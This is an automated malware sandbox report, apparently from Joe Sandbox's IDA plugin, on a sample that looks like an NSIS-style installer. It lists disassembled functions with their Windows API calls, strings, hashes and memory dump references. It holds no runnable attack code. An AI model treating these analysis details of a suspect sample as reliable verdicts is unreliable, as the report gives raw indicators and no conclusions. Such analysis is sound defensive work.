Opcode Fuzzy Hash: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
Instruction Fuzzy Hash: 8551FA75D0411AABDF24DF94CA84AAEBBB9FF04344F10817BE941B62D0D7B49D82CB58

Function 004055B9 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
lstrlenW.KERNEL32(004033FA,007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction ID: 2aa9806f2f20795f51ccdab708f13b580d3c68b3f08286e5c277b3a8c7657607
Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction Fuzzy Hash: 9F21A175900518BACF119F65DD44ADFBFB9EF85354F10843AF904B22A0C7794A40CFA8

Function 004067E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
CharNextW.USER32(?,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C

Strings

*?|<>/":, xrefs: 00406834
C:\Users\user\AppData\Local\Temp\, xrefs: 004067E3

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1201062745
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 1b09f5ceaf5ae9834212bd1c7625b2fa446eb07de75e5307cf61d1a9d5c412e4
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F411C46780221295DB303B54CC44AB7A2A8EF94790F52C43FED8A732C0E77C5C9286BD

Function 00404E6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E89
GetMessagePos.USER32 ref: 00404E91
ScreenToClient.USER32(?,?), ref: 00404EAB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EBD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EE3

Strings

f, xrefs: 00404EBF

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: 5c8f3b82e3fec6324f9bbbe2439b20c808b00c1b0a410ced479a2b1fdaf2ea9b
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 58015E7290021DBADB00DB94DD85FFEBBBCAF95711F10412BBA51B61D0D7B49A018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(000DB570,00000064,000DB574), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction ID: ee21eaa8db301b2ce928a6645e07ba1980cadc5c51e80129ae912554bbca5152
Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction Fuzzy Hash: 70014F7064020DBBEF209F60DE4AFAE3B79AB04344F108039FA12A51D0DBB99A559B58

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 0c0a4a72f1d98ed848e00ddbaa97379b691fc8b9e6fa1ea35c83bd1cba73d936
Instruction ID: c874634495a4b446fb751942016c9e5cc597fe9d4aaee657827b690e02a6ad76
Opcode Fuzzy Hash: 0c0a4a72f1d98ed848e00ddbaa97379b691fc8b9e6fa1ea35c83bd1cba73d936
Instruction Fuzzy Hash: 0231AF71D00128ABCF21AFA5CE49D9E7EB9AF45324F10423AF551762E1CB794C419FA8

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: f4e9f9df98694428ddab884ff763f6d95bd8863eb2dee119fedf423c13c251a9
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: F4216B7150010ABFDF119F90CE89EEF7B7DEB54388F100076B949B11E0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
Instruction ID: 81d9f022906ee6244d37cab0c0f29790f3f95abc113fce67048acd2dff417476
Opcode Fuzzy Hash: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
Instruction Fuzzy Hash: 8B212672904119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0CB789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
Instruction ID: ae55cc3b281789b51300203e9483e2b03caeed801d822a8147b49045e961ec64
Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
Instruction Fuzzy Hash: F4017571954240EFEB015BB4AE99ADD3FB4AF15301F10497AF141B61E2CAB904449B2C

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
Instruction ID: 5d336d63bea0f4dd646979e45c63d0f3d2888182fff20de36e63ae33d1796f08
Opcode Fuzzy Hash: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
Instruction Fuzzy Hash: 2A21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Function 00404D60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
wsprintfW.USER32 ref: 00404E0A
SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D

Strings

%u.%u%s%s, xrefs: 00404DEB

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
Instruction ID: a0af56433f9d431f5046a9fb23145e7ed032e621b14740f85a591f17ba678af7
Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
Instruction Fuzzy Hash: 6211E773A041283BDB1055ADEC45EAE369CDF86334F254237FA25F21D1EA78CC2182E8

Function 00405E03 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E09
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E13
lstrcatW.KERNEL32(?,0040A014), ref: 00405E25

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E03

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: 4e7d22dde89eb6c6e58e9bdf2ba0d87ed645a023497c505cae90b6f2f3d33009
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: E4D05E31101534AAC211AB48AC04CDB62ACAF46308342403AF541B60A9D7785A5186ED

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
Instruction ID: b3f6d95266cfacf47387896993e225006fc9e276d4c6cccc21fcd3db6f14a0d4
Opcode Fuzzy Hash: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
Instruction Fuzzy Hash: A0F05E70406621AFC6606F90BE08A9B7A68FB45B62B45843BF145F11E8CB3C48818B9D

Function 0040552D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040555C
CallWindowProcW.USER32(?,?,?,?), ref: 004055AD

Part of subcall function 004044FF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404511

Strings

, xrefs: 0040553D

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
Instruction ID: 2594d1478f304c6df33f9b27245b4e56ea2549959463d6621d9ed09538c1d2b9
Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
Instruction Fuzzy Hash: 6C017C71100608BBEF219F15DD80A9B3B27EB88750F104037FA05B61D5C73E9D919E6D

Function 00403B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B49,00403A5F,?,?,00000008,0000000A,0000000C), ref: 00403B8B
GlobalFree.KERNEL32(00000000), ref: 00403B92

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B71

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
